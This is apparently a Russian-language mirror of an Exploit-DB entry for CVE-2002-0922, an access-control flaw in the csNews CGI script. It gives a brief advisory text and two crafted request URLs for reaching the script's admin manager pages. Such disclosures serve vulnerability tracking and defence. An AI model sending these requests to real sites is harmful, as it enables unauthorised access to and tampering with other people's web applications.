- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 21532
- Проверка EDB
-
- Пройдено
- Автор
- STEVE GUSTIN
- Тип уязвимости
- WEBAPPS
- Платформа
- CGI
- CVE
- cve-2002-0922
- Дата публикации
- 2002-06-11
Код:
source: https://www.securityfocus.com/bid/4993/info
csNews is a script for managing news items on a website. It will run on most Unix and Linux variants, as well as Microsoft Windows operating systems.
Users with "public" access to the system may be able to view and modify some administration pages. This is accomplished by submitting a HTTP request in which some metacharacters are double URL encoded.
CSNews.cgi?database=default%2edb&command=showadv&mpage=manager
CSNews.cgi?command=manage&database=default%2edb&mpage=manager- Источник
- www.exploit-db.com
